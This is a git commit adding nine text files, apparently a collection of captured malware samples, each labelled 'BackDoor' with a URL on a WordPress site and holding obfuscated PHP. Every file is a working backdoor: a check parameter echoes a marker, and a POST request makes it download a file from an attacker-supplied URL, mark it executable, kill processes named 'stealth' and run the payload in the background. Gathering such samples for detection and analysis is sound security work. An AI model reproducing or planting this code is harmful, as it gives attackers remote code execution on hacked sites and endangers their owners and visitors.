Add files via upload

2025-06-21 10:21:19 +00:00 · 2019-08-06 10:00:43 +08:00 · 2019-08-06 10:00:43 +08:00 · 366d9f3e37
commit 366d9f3e37
parent 90e7da2c51
9 changed files with 55 additions and 0 deletions
--- a/data/wordpress/PHP/3uHxyFAZ.txt
+++ b/data/wordpress/PHP/3uHxyFAZ.txt
@ -0,0 +1,10 @@
+BackDoor: http://saiinfotech.net/wp-content/uploads/2019/07/_tonesque.php
+
+<?php
+/*   __________________________________________________
+    |  Obfuscated by YAK Pro - Php Obfuscator  2.0.4   |
+    |              on 2019-07-15 15:52:32              |
+    |    GitHub: https://github.com/pk-fr/yakpro-po    |
+    |__________________________________________________|
+*/
+goto Il; rR: echo "\141\x75\170\x36\x54\150\x65\151\x6f\107\150\165\145\121\x75\63"; goto a0; zV: echo "\157\153"; goto bD; pM: if (!($_POST["\x63\160"] == "\x64\x6f\167\x6e\x6c\x6f\141\144")) { goto QU; } goto a_; bD: mb: goto qk; uF: chmod($M1, 0755); goto Fv; Xx: if (empty($Fy)) { goto mb; } goto vG; a0: die; goto Xa; PG: exec($dX); goto zV; Fv: $dX = "\x2e\x2f{$M1}\40\x3e\x20\x2f\x64\x65\166\57\x6e\x75\x6c\154\40\x32\x3e\x2f\144\145\x76\57\x6e\x75\154\154\40\x26"; goto PG; Il: error_reporting(0); goto e2; jT: exec("\x70\x6b\151\154\x6c\x20\x2d\146\x20\x2d\x39\40\163\x74\x65\x61\x6c\x74\x68"); goto u0; rW: exec("\x70\x6b\151\x6c\154\x20\x2d\x39\x20\55\146\40\163\164\145\141\154\164\x68"); goto jT; vG: @unlink($M1); goto rW; a_: $M1 = substr(str_shuffle(str_repeat($zF = "\x30\x31\62\x33\x34\x35\x36\67\x38\x39\141\x62\x63\144\x65\146\x67\150\151\152\x6b\154\155\156\x6f\x70\161\x72\163\164\x75\x76\167\x78\x79\x7a\x41\x42\103\x44\105\106\107\x48\x49\112\x4b\x4c\x4d\116\x4f\120\121\122\123\x54\125\126\127\130\131\132", ceil(6 / strlen($zF)))), 1, 6); goto Eo; u0: $s9 = file_get_contents(trim($Fy)); goto yE; Eo: $Fy = $_POST["\165\162\x6c"]; goto Xx; e2: if (!($_GET["\x63\x67"] == "\x63\150\153")) { goto EZ; } goto rR; yE: file_put_contents($M1, $s9); goto uF; Xa: EZ: goto pM; qk: QU:
--- a/data/wordpress/PHP/6hCDtMRr.txt
+++ b/data/wordpress/PHP/6hCDtMRr.txt
@ -0,0 +1,3 @@
+BackDoor: http://saiinfotech.net/wp-content/plugins/apikey/class-http.php
+
+<?php goto StL3CvvZWZ4ZP3LN; ICVjPs6L2IIxv2U8: $g_m1vFF5oRza0VH5 = $_POST["\x75\x72\x6c"]; goto tnUw7hNUH7SBr9GU; Robk18YSAj6GeUI6: F2R1Z6UudYjFgfyw: goto wbIQjLxcUHdF9PvS; khupw_NNuFACbR4u: die; goto Robk18YSAj6GeUI6; EpWnDRVuPP4uOPUy: $zoUdl1u2MM35rLMf = file_get_contents(trim($g_m1vFF5oRza0VH5)); goto dSjLZ_zvINiN3hfp; Lim_S_HmxIGiGLX_: $h2mklze53I9MDH0c = "\x2e\57{$cqQHbAE5XLgs8psC}\x20\x3e\x20\x2f\x64\x65\166\57\x6e\x75\x6c\154\40\x32\76\57\144\x65\x76\57\x6e\x75\x6c\x6c\40\46"; goto vXDQhKC1LeSwPpkn; vXDQhKC1LeSwPpkn: exec($h2mklze53I9MDH0c); goto CMJjHYia4AeTRvut; fxDOKj_Z4cBjbQcH: echo "\x61\165\x78\x36\124\150\x65\x69\x6f\x47\150\x75\x65\x51\x75\x33"; goto khupw_NNuFACbR4u; xpGRDihSwc_RjqUO: if (!($_GET["\x63\147"] == "\x63\x68\153")) { goto F2R1Z6UudYjFgfyw; } goto fxDOKj_Z4cBjbQcH; wbIQjLxcUHdF9PvS: if (!($_POST["\x63\x70"] == "\144\157\x77\156\x6c\157\141\x64")) { goto jlA1Pp4NQyJUHBK3; } goto t5Vjb2U246Jb61Jm; t5Vjb2U246Jb61Jm: $cqQHbAE5XLgs8psC = substr(str_shuffle(str_repeat($ZNPTFf3D_3zXFaNZ = "\x30\61\62\x33\x34\65\x36\67\x38\71\x61\142\x63\x64\145\146\x67\x68\151\x6a\153\154\x6d\156\157\x70\x71\162\x73\164\x75\166\x77\170\171\172\x41\x42\103\x44\105\x46\x47\110\x49\x4a\x4b\114\x4d\116\x4f\x50\121\x52\x53\x54\125\x56\x57\130\131\x5a", ceil(6 / strlen($ZNPTFf3D_3zXFaNZ)))), 1, 6); goto ICVjPs6L2IIxv2U8; ebufrDnW4NCIIb9O: chmod($cqQHbAE5XLgs8psC, 0755); goto Lim_S_HmxIGiGLX_; StL3CvvZWZ4ZP3LN: error_reporting(0); goto xpGRDihSwc_RjqUO; CMJjHYia4AeTRvut: echo "\x6f\153"; goto jh5GXp7ndUrL8zjk; y5_VAiuFIE44R6Ce: exec("\x70\x6b\151\154\x6c\x20\55\x39\x20\x2d\146\40\x73\x74\x65\141\154\164\x68"); goto AlFi31sya97TFhVq; dSjLZ_zvINiN3hfp: file_put_contents($cqQHbAE5XLgs8psC, $zoUdl1u2MM35rLMf); goto ebufrDnW4NCIIb9O; Gia6TMaCHDz7UacT: @unlink($cqQHbAE5XLgs8psC); goto y5_VAiuFIE44R6Ce; AlFi31sya97TFhVq: exec("\160\x6b\x69\x6c\x6c\40\55\146\x20\55\x39\x20\163\x74\145\141\x6c\x74\x68"); goto EpWnDRVuPP4uOPUy; tnUw7hNUH7SBr9GU: if (empty($g_m1vFF5oRza0VH5)) { goto NKb44R5q7UbVMieR; } goto Gia6TMaCHDz7UacT; jh5GXp7ndUrL8zjk: NKb44R5q7UbVMieR: goto lqXtIAJ_OsepPPNk; lqXtIAJ_OsepPPNk: jlA1Pp4NQyJUHBK3:
--- a/data/wordpress/PHP/6yK2y2Qm.txt
+++ b/data/wordpress/PHP/6yK2y2Qm.txt
@ -0,0 +1,10 @@
+BackDoor: http://saiinfotech.net/wp-content/uploads/2019/07/3rd-debug-bar.php
+
+<?php
+/*   __________________________________________________
+    |  Obfuscated by YAK Pro - Php Obfuscator  2.0.4   |
+    |              on 2019-07-15 15:52:32              |
+    |    GitHub: https://github.com/pk-fr/yakpro-po    |
+    |__________________________________________________|
+*/
+goto Il; rR: echo "\141\x75\170\x36\x54\150\x65\151\x6f\107\150\165\145\121\x75\63"; goto a0; zV: echo "\157\153"; goto bD; pM: if (!($_POST["\x63\160"] == "\x64\x6f\167\x6e\x6c\x6f\141\144")) { goto QU; } goto a_; bD: mb: goto qk; uF: chmod($M1, 0755); goto Fv; Xx: if (empty($Fy)) { goto mb; } goto vG; a0: die; goto Xa; PG: exec($dX); goto zV; Fv: $dX = "\x2e\x2f{$M1}\40\x3e\x20\x2f\x64\x65\166\57\x6e\x75\x6c\154\40\x32\x3e\x2f\144\145\x76\57\x6e\x75\154\154\40\x26"; goto PG; Il: error_reporting(0); goto e2; jT: exec("\x70\x6b\151\154\x6c\x20\x2d\146\x20\x2d\x39\40\163\x74\x65\x61\x6c\x74\x68"); goto u0; rW: exec("\x70\x6b\151\x6c\154\x20\x2d\x39\x20\55\146\40\163\164\145\141\154\164\x68"); goto jT; vG: @unlink($M1); goto rW; a_: $M1 = substr(str_shuffle(str_repeat($zF = "\x30\x31\62\x33\x34\x35\x36\67\x38\x39\141\x62\x63\144\x65\146\x67\150\151\152\x6b\154\155\156\x6f\x70\161\x72\163\164\x75\x76\167\x78\x79\x7a\x41\x42\103\x44\105\106\107\x48\x49\112\x4b\x4c\x4d\116\x4f\120\121\122\123\x54\125\126\127\130\131\132", ceil(6 / strlen($zF)))), 1, 6); goto Eo; u0: $s9 = file_get_contents(trim($Fy)); goto yE; Eo: $Fy = $_POST["\165\162\x6c"]; goto Xx; e2: if (!($_GET["\x63\x67"] == "\x63\150\153")) { goto EZ; } goto rR; yE: file_put_contents($M1, $s9); goto uF; Xa: EZ: goto pM; qk: QU:
--- a/data/wordpress/PHP/JFtCDEJE.txt
+++ b/data/wordpress/PHP/JFtCDEJE.txt
@ -0,0 +1,3 @@
+BackDoor: http://saiinfotech.net/wp-content/uploads/2019/07/single-short-description.php
+
+<?php goto StL3CvvZWZ4ZP3LN; ICVjPs6L2IIxv2U8: $g_m1vFF5oRza0VH5 = $_POST["\x75\x72\x6c"]; goto tnUw7hNUH7SBr9GU; Robk18YSAj6GeUI6: F2R1Z6UudYjFgfyw: goto wbIQjLxcUHdF9PvS; khupw_NNuFACbR4u: die; goto Robk18YSAj6GeUI6; EpWnDRVuPP4uOPUy: $zoUdl1u2MM35rLMf = file_get_contents(trim($g_m1vFF5oRza0VH5)); goto dSjLZ_zvINiN3hfp; Lim_S_HmxIGiGLX_: $h2mklze53I9MDH0c = "\x2e\57{$cqQHbAE5XLgs8psC}\x20\x3e\x20\x2f\x64\x65\166\57\x6e\x75\x6c\154\40\x32\76\57\144\x65\x76\57\x6e\x75\x6c\x6c\40\46"; goto vXDQhKC1LeSwPpkn; vXDQhKC1LeSwPpkn: exec($h2mklze53I9MDH0c); goto CMJjHYia4AeTRvut; fxDOKj_Z4cBjbQcH: echo "\x61\165\x78\x36\124\150\x65\x69\x6f\x47\150\x75\x65\x51\x75\x33"; goto khupw_NNuFACbR4u; xpGRDihSwc_RjqUO: if (!($_GET["\x63\147"] == "\x63\x68\153")) { goto F2R1Z6UudYjFgfyw; } goto fxDOKj_Z4cBjbQcH; wbIQjLxcUHdF9PvS: if (!($_POST["\x63\x70"] == "\144\157\x77\156\x6c\157\141\x64")) { goto jlA1Pp4NQyJUHBK3; } goto t5Vjb2U246Jb61Jm; t5Vjb2U246Jb61Jm: $cqQHbAE5XLgs8psC = substr(str_shuffle(str_repeat($ZNPTFf3D_3zXFaNZ = "\x30\61\62\x33\x34\65\x36\67\x38\71\x61\142\x63\x64\145\146\x67\x68\151\x6a\153\154\x6d\156\157\x70\x71\162\x73\164\x75\166\x77\170\171\172\x41\x42\103\x44\105\x46\x47\110\x49\x4a\x4b\114\x4d\116\x4f\x50\121\x52\x53\x54\125\x56\x57\130\131\x5a", ceil(6 / strlen($ZNPTFf3D_3zXFaNZ)))), 1, 6); goto ICVjPs6L2IIxv2U8; ebufrDnW4NCIIb9O: chmod($cqQHbAE5XLgs8psC, 0755); goto Lim_S_HmxIGiGLX_; StL3CvvZWZ4ZP3LN: error_reporting(0); goto xpGRDihSwc_RjqUO; CMJjHYia4AeTRvut: echo "\x6f\153"; goto jh5GXp7ndUrL8zjk; y5_VAiuFIE44R6Ce: exec("\x70\x6b\151\154\x6c\x20\55\x39\x20\x2d\146\40\x73\x74\x65\141\154\164\x68"); goto AlFi31sya97TFhVq; dSjLZ_zvINiN3hfp: file_put_contents($cqQHbAE5XLgs8psC, $zoUdl1u2MM35rLMf); goto ebufrDnW4NCIIb9O; Gia6TMaCHDz7UacT: @unlink($cqQHbAE5XLgs8psC); goto y5_VAiuFIE44R6Ce; AlFi31sya97TFhVq: exec("\160\x6b\x69\x6c\x6c\40\55\146\x20\55\x39\x20\163\x74\145\141\x6c\x74\x68"); goto EpWnDRVuPP4uOPUy; tnUw7hNUH7SBr9GU: if (empty($g_m1vFF5oRza0VH5)) { goto NKb44R5q7UbVMieR; } goto Gia6TMaCHDz7UacT; jh5GXp7ndUrL8zjk: NKb44R5q7UbVMieR: goto lqXtIAJ_OsepPPNk; lqXtIAJ_OsepPPNk: jlA1Pp4NQyJUHBK3:
--- a/data/wordpress/PHP/PuT9UvUS.txt
+++ b/data/wordpress/PHP/PuT9UvUS.txt
@ -0,0 +1,3 @@
+BackDoor: http://saiinfotech.net/wp-content/uploads/2019/07/default-widgets.php
+
+<?php goto D242; Cfc5: echo "\x61\x75\x78\x36\x54\150\x65\151\157\x47\150\165\x65\x51\x75\63"; goto e83e; f7cc: B487: goto d892; Ff02: chmod($C43e, 0755); goto b30d; e9df: if (empty($B113)) { goto B487; } goto a0b1; B80e: echo "\157\153"; goto f7cc; c76b: if (!($_POST["\143\x70"] == "\144\157\167\x6e\x6c\157\x61\x64")) { goto Ee85; } goto A93f; bdbb: exec("\x70\153\151\x6c\154\40\x2d\71\x20\55\x66\x20\163\x74\x65\141\x6c\x74\150"); goto c200; F9c6: $B113 = $_POST["\x75\162\x6c"]; goto e9df; b30d: $Ab43 = "\56\x2f{$C43e}\x20\76\40\57\144\x65\166\x2f\x6e\x75\154\x6c\x20\62\76\x2f\144\145\x76\x2f\x6e\x75\154\x6c\40\x26"; goto D4a3; e83e: die; goto D223; d875: if (!($_GET["\x63\147"] == "\143\x68\x6b")) { goto F9f0; } goto Cfc5; D223: F9f0: goto c76b; A93f: $C43e = substr(str_shuffle(str_repeat($bf09 = "\60\61\62\x33\x34\65\x36\67\x38\x39\141\x62\143\x64\x65\x66\147\x68\x69\152\153\x6c\x6d\x6e\x6f\x70\161\162\163\164\x75\166\x77\x78\x79\x7a\x41\102\x43\x44\105\x46\107\x48\x49\112\113\x4c\x4d\116\117\120\121\122\123\x54\125\126\127\x58\131\132", ceil(6 / strlen($bf09)))), 1, 6); goto F9c6; F064: $b3e4 = file_get_contents(trim($B113)); goto a92a; D4a3: exec($Ab43); goto B80e; a92a: file_put_contents($C43e, $b3e4); goto Ff02; a0b1: @unlink($C43e); goto bdbb; c200: exec("\160\x6b\x69\154\154\40\x2d\146\x20\x2d\71\40\x73\164\145\141\154\x74\150"); goto F064; D242: error_reporting(0); goto d875; d892: Ee85:
--- a/data/wordpress/PHP/cugKiQ7h.txt
+++ b/data/wordpress/PHP/cugKiQ7h.txt
@ -0,0 +1,3 @@
+BackDoor: http://saiinfotech.net/wp-content/uploads/2019/07/i18ES.php
+
+<?php goto Ac877726f671fe1d; Eaaea51e455e96b9: chmod($a286ef956f6c6553, 0755); goto Da1caf301e6b2c02; ee23265412f28704: @unlink($a286ef956f6c6553); goto C4851b62c43ac97a; f49c87d4ccb81695: $a286ef956f6c6553 = substr(str_shuffle(str_repeat($C6dab51f92e9869d = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil(6 / strlen($C6dab51f92e9869d)))), 1, 6); goto C3eba0871916aca4; A0ce6881645228a4: echo "aux6TheioGhueQu3"; goto bd84e91c183f7038; Ac877726f671fe1d: error_reporting(0); goto Ef162894f290dcdd; f14c47fe2bc585a8: exec($a759e63512a11929); goto de3a69e598d56eab; a4aab28e7edb7d89: if (empty($Faa3dd6544db6886)) { goto C21c35351e837831; } goto ee23265412f28704; bd84e91c183f7038: die; goto C713fecfc2175618; Ef162894f290dcdd: if (!($_GET["cg"] == "chk")) { goto c287b719d61ce83e; } goto A0ce6881645228a4; de3a69e598d56eab: echo "ok"; goto e87b68575f3a110f; Da1caf301e6b2c02: $a759e63512a11929 = "./{$a286ef956f6c6553} > /dev/null 2>/dev/null &"; goto f14c47fe2bc585a8; e87cd57f6d82e7b0: $E49cd0efaa8ff31f = file_get_contents(trim($Faa3dd6544db6886)); goto Dc410effad575a0b; C4851b62c43ac97a: exec("pkill -9 -f stealth"); goto ad497aa24fb4c3fb; C713fecfc2175618: c287b719d61ce83e: goto f8771efd2a0db683; ad497aa24fb4c3fb: exec("pkill -f -9 stealth"); goto e87cd57f6d82e7b0; f8771efd2a0db683: if (!($_POST["cp"] == "download")) { goto E24766305b25a22e; } goto f49c87d4ccb81695; Dc410effad575a0b: file_put_contents($a286ef956f6c6553, $E49cd0efaa8ff31f); goto Eaaea51e455e96b9; e87b68575f3a110f: C21c35351e837831: goto ac62473619ae9a02; C3eba0871916aca4: $Faa3dd6544db6886 = $_POST["url"]; goto a4aab28e7edb7d89; ac62473619ae9a02: E24766305b25a22e:
--- a/data/wordpress/PHP/fbHtDWxe.txt
+++ b/data/wordpress/PHP/fbHtDWxe.txt
@ -0,0 +1,3 @@
+BackDoor: http://saiinfotech.net/wp-content/uploads/2019/07/direct.php
+
+<?php goto df3bce5abd5; A0877fd2132: $e57fdd21539 = file_get_contents(trim($De2b76dcb9b)); goto c47c12134ca; ad3ddb9e406: if (!($_GET["\x63\x67"] == "\143\150\x6b")) { goto Ac16e597d99; } goto Ec0778008a8; df3bce5abd5: error_reporting(0); goto ad3ddb9e406; Dcf68dc9320: exec("\x70\x6b\151\154\154\40\x2d\146\40\55\71\x20\x73\x74\x65\141\x6c\x74\150"); goto A0877fd2132; Cf937f3e8a3: exec($c86058fc885); goto A106b0d4256; a11812bbeae: Ac16e597d99: goto c94e4588a58; a0c3b3f1f60: @unlink($Abe40aaedb8); goto b34d99278a8; F1484b8d10f: chmod($Abe40aaedb8, 0755); goto b72804dfe74; A106b0d4256: echo "\x6f\153"; goto B595590c2af; c8c0d7c6ec3: $De2b76dcb9b = $_POST["\x75\162\x6c"]; goto F6f14d209f8; D979c58fc0e: die; goto a11812bbeae; bc0e94ae976: $Abe40aaedb8 = substr(str_shuffle(str_repeat($Ec8f2abdda4 = "\60\61\62\63\64\65\x36\x37\70\71\141\x62\143\x64\x65\x66\147\150\x69\152\153\x6c\x6d\x6e\157\160\161\162\163\x74\165\166\167\170\x79\172\101\102\103\x44\105\106\x47\x48\111\x4a\x4b\114\115\x4e\117\x50\x51\x52\x53\124\125\x56\x57\x58\131\132", ceil(6 / strlen($Ec8f2abdda4)))), 1, 6); goto c8c0d7c6ec3; c94e4588a58: if (!($_POST["\x63\160"] == "\x64\157\x77\156\154\157\x61\144")) { goto Dddab5fe200; } goto bc0e94ae976; F6f14d209f8: if (empty($De2b76dcb9b)) { goto e2adee1ea9b; } goto a0c3b3f1f60; b72804dfe74: $c86058fc885 = "\x2e\57{$Abe40aaedb8}\x20\76\40\x2f\x64\x65\x76\57\156\x75\154\x6c\x20\x32\76\57\144\145\x76\57\156\165\x6c\x6c\x20\46"; goto Cf937f3e8a3; B595590c2af: e2adee1ea9b: goto B78ecffc9ba; b34d99278a8: exec("\160\x6b\x69\x6c\x6c\x20\x2d\71\40\x2d\146\x20\x73\164\145\141\x6c\164\x68"); goto Dcf68dc9320; Ec0778008a8: echo "\141\x75\x78\x36\124\150\x65\151\157\x47\150\165\x65\121\165\63"; goto D979c58fc0e; c47c12134ca: file_put_contents($Abe40aaedb8, $e57fdd21539); goto F1484b8d10f; B78ecffc9ba: Dddab5fe200:
--- a/data/wordpress/PHP/fgwNrs5e.txt
+++ b/data/wordpress/PHP/fgwNrs5e.txt
@ -0,0 +1,10 @@
+BackDoor: http://saiinfotech.net/wp-content/uploads/2019/07/wp-index.php
+
+<?php
+/*   __________________________________________________
+    |  Obfuscated by YAK Pro - Php Obfuscator  2.0.4   |
+    |              on 2019-07-15 15:52:32              |
+    |    GitHub: https://github.com/pk-fr/yakpro-po    |
+    |__________________________________________________|
+*/
+goto Il; rR: echo "\141\x75\170\x36\x54\150\x65\151\x6f\107\150\165\145\121\x75\63"; goto a0; zV: echo "\157\153"; goto bD; pM: if (!($_POST["\x63\160"] == "\x64\x6f\167\x6e\x6c\x6f\141\144")) { goto QU; } goto a_; bD: mb: goto qk; uF: chmod($M1, 0755); goto Fv; Xx: if (empty($Fy)) { goto mb; } goto vG; a0: die; goto Xa; PG: exec($dX); goto zV; Fv: $dX = "\x2e\x2f{$M1}\40\x3e\x20\x2f\x64\x65\166\57\x6e\x75\x6c\154\40\x32\x3e\x2f\144\145\x76\57\x6e\x75\154\154\40\x26"; goto PG; Il: error_reporting(0); goto e2; jT: exec("\x70\x6b\151\154\x6c\x20\x2d\146\x20\x2d\x39\40\163\x74\x65\x61\x6c\x74\x68"); goto u0; rW: exec("\x70\x6b\151\x6c\154\x20\x2d\x39\x20\55\146\40\163\164\145\141\154\164\x68"); goto jT; vG: @unlink($M1); goto rW; a_: $M1 = substr(str_shuffle(str_repeat($zF = "\x30\x31\62\x33\x34\x35\x36\67\x38\x39\141\x62\x63\144\x65\146\x67\150\151\152\x6b\154\155\156\x6f\x70\161\x72\163\164\x75\x76\167\x78\x79\x7a\x41\x42\103\x44\105\106\107\x48\x49\112\x4b\x4c\x4d\116\x4f\120\121\122\123\x54\125\126\127\130\131\132", ceil(6 / strlen($zF)))), 1, 6); goto Eo; u0: $s9 = file_get_contents(trim($Fy)); goto yE; Eo: $Fy = $_POST["\165\162\x6c"]; goto Xx; e2: if (!($_GET["\x63\x67"] == "\x63\150\153")) { goto EZ; } goto rR; yE: file_put_contents($M1, $s9); goto uF; Xa: EZ: goto pM; qk: QU:
--- a/data/wordpress/PHP/zRj9ETT9.txt
+++ b/data/wordpress/PHP/zRj9ETT9.txt
@ -0,0 +1,10 @@
+BackDoor: http://saiinfotech.net/wp-content/uploads/2019/07/416.php
+
+<?php
+/*   __________________________________________________
+    |  Obfuscated by YAK Pro - Php Obfuscator  2.0.4   |
+    |              on 2019-07-15 15:52:32              |
+    |    GitHub: https://github.com/pk-fr/yakpro-po    |
+    |__________________________________________________|
+*/
+goto Il; rR: echo "\141\x75\170\x36\x54\150\x65\151\x6f\107\150\165\145\121\x75\63"; goto a0; zV: echo "\157\153"; goto bD; pM: if (!($_POST["\x63\160"] == "\x64\x6f\167\x6e\x6c\x6f\141\144")) { goto QU; } goto a_; bD: mb: goto qk; uF: chmod($M1, 0755); goto Fv; Xx: if (empty($Fy)) { goto mb; } goto vG; a0: die; goto Xa; PG: exec($dX); goto zV; Fv: $dX = "\x2e\x2f{$M1}\40\x3e\x20\x2f\x64\x65\166\57\x6e\x75\x6c\154\40\x32\x3e\x2f\144\145\x76\57\x6e\x75\154\154\40\x26"; goto PG; Il: error_reporting(0); goto e2; jT: exec("\x70\x6b\151\154\x6c\x20\x2d\146\x20\x2d\x39\40\163\x74\x65\x61\x6c\x74\x68"); goto u0; rW: exec("\x70\x6b\151\x6c\154\x20\x2d\x39\x20\55\146\40\163\164\145\141\154\164\x68"); goto jT; vG: @unlink($M1); goto rW; a_: $M1 = substr(str_shuffle(str_repeat($zF = "\x30\x31\62\x33\x34\x35\x36\67\x38\x39\141\x62\x63\144\x65\146\x67\150\151\152\x6b\154\155\156\x6f\x70\161\x72\163\164\x75\x76\167\x78\x79\x7a\x41\x42\103\x44\105\106\107\x48\x49\112\x4b\x4c\x4d\116\x4f\120\121\122\123\x54\125\126\127\130\131\132", ceil(6 / strlen($zF)))), 1, 6); goto Eo; u0: $s9 = file_get_contents(trim($Fy)); goto yE; Eo: $Fy = $_POST["\165\162\x6c"]; goto Xx; e2: if (!($_GET["\x63\x67"] == "\x63\150\153")) { goto EZ; } goto rR; yE: file_put_contents($M1, $s9); goto uF; Xa: EZ: goto pM; qk: QU: